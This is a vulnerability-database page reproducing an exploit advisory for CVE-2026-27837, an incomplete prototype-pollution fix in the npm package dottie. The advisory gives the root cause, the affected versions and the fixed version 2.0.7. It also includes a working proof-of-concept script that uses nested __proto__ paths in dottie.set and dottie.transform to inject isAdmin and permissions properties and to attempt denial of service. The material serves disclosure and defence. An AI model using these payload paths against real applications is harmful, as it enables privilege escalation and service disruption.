Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 dottie 2.0.6 Prototype Pollution Bypass

🗓️ 05 Mar 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 122 Views

Dottie 2.0.4–2.0.6 permits prototype pollution via nested __proto__ segments in set and transform.

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities in IBM watsonx Orchestrate Developer Edition
7 Apr 202607:08
ibm
IBM Security Bulletins		Security Bulletin: Security Vulnerabilities have been found in IBM Verify Identity Access Digital Credentials
31 Mar 202600:38
ibm
ATTACKERKB		CVE-2026-27837
26 Feb 202600:19
attackerkb
Circl		CVE-2023-26132
26 Feb 202602:02
circl
Circl		CVE-2026-27837
26 Feb 202601:53
circl
CNNVD		dottie 安全漏洞
10 Jun 202300:00
cnnvd
CNNVD		dottie 安全漏洞
26 Feb 202600:00
cnnvd
CVE		CVE-2023-26132
10 Jun 202305:00
cve
CVE		CVE-2026-27837
26 Feb 202600:19
cve
Cvelist		CVE-2023-26132
10 Jun 202305:00
cvelist
Rows per page
=============================================================================================================================================
    | # Title     : dottie 2.0.4–2.0.6 Incomplete Prototype Pollution Allows Bypass via Nested __proto__ Segments                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.npmjs.com/package/dottie                                                                                        |
    =============================================================================================================================================
    
    [+] Summary    :  CVE-2026-27837 describes an incomplete patch in dottie versions 2.0.4 through 2.0.6, following the original CVE-2023-26132 fix attempt.
    
    The protection added in commit 7d3aee1 validates only the first segment of a dot-separated property path against dangerous keys such as __proto__. However, the validation fails to inspect subsequent path segments. An attacker can therefore bypass the guard by placing __proto__ in any position other than the first (e.g., user.__proto__.isAdmin).
    
    As a result, both:
    
    dottie.set()
    
    dottie.transform()
    
    remain vulnerable to Prototype Pollution.
    
    [+] Impact
    
    An attacker controlling object paths can:
    
    Inject properties into Object.prototype
    
    Escalate privileges (e.g., force isAdmin = true)
    
    Manipulate application logic
    
    Inject arbitrary inherited permissions
    
    Trigger Denial of Service (DoS) by overwriting prototypes
    
    Because polluted properties are inherited rather than owned, they often bypass standard validation checks like hasOwnProperty, making detection difficult.
    
    [+] Affected Versions
    
    2.0.4
    
    2.0.5
    
    2.0.6
    
    [+] Fixed Version
    
    2.0.7
    
    Version 2.0.7 introduces a comprehensive validation of all path segments, properly blocking dangerous keys regardless of position.
    				  
    [+] POC   :  exploit.js 
    
    const dottie = require('dottie');
    
    console.log("=== Scenario 1: dottie.set() Bypass ===");
    
    const session = {};
    const path = "user.__proto__.isAdmin"; 
    dottie.set(session, path, true);
    console.log("Resulting Object Structure:");
    console.log("- session.user.isAdmin:", session.user.isAdmin); 
    console.log("- Is 'isAdmin' an own property?:", session.user.hasOwnProperty('isAdmin'));
    console.log("- Object.keys(session.user):", Object.keys(session.user));
    
    if (session.user.isAdmin) {
        console.log("CRITICAL: Unauthorized access granted! (Admin Privileges)");
    }
    
    console.log("\n" + "-".repeat(40) + "\n");
    
    console.log("=== Scenario 2: dottie.transform() Bypass ===");
    
    const maliciousData = {
        "profile.name": "GuestUser",
        "profile.__proto__.permissions": ["read", "write", "delete"]
    };
    
    const transformed = dottie.transform(maliciousData);
    
    console.log("Transformed Profile:");
    console.log("- Name:", transformed.profile.name);
    console.log("- Permissions:", transformed.profile.permissions); 
    if (transformed.profile.permissions.includes("delete")) {
        console.log("CRITICAL: User can delete records due to injected prototype property!");
    }
    
    console.log("\n=== Scenario 3: Denial of Service (DoS) ===");
    try {
        const crashObj = {};
    
        dottie.set(crashObj, "data.__proto__", {}); 
        console.log("Prototype overwritten successfully.");
    } catch (e) {
        console.log("Error during DoS attempt:", e.message);
    }
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Mar 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5 - 9.8
EPSS0.00165
SSVC
prototype pollutionnested prototype segmentsdottie versionsset functiontransform function
122